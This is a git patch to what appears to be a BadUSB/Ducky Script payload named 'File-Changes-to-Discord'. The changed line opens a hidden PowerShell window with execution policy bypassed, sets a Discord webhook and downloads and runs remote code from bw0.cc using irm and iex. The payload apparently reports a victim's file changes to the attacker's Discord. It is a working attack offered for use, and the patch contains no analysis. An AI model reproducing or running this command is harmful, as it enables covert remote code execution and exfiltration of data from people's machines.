From b7d56798f73ccbe566f44ec41298cf514e85d886 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 18 Jun 2025 15:09:35 +0000 Subject: [PATCH] Update File-Changes-to-Discord.txt --- File-Monitor-to-Discord/File-Changes-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/File-Monitor-to-Discord/File-Changes-to-Discord.txt b/File-Monitor-to-Discord/File-Changes-to-Discord.txt index 418e0b0..615336a 100644 --- a/File-Monitor-to-Discord/File-Changes-to-Discord.txt +++ b/File-Monitor-to-Discord/File-Changes-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/dcfm | iex +STRING powershell -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/dcfm) ENTER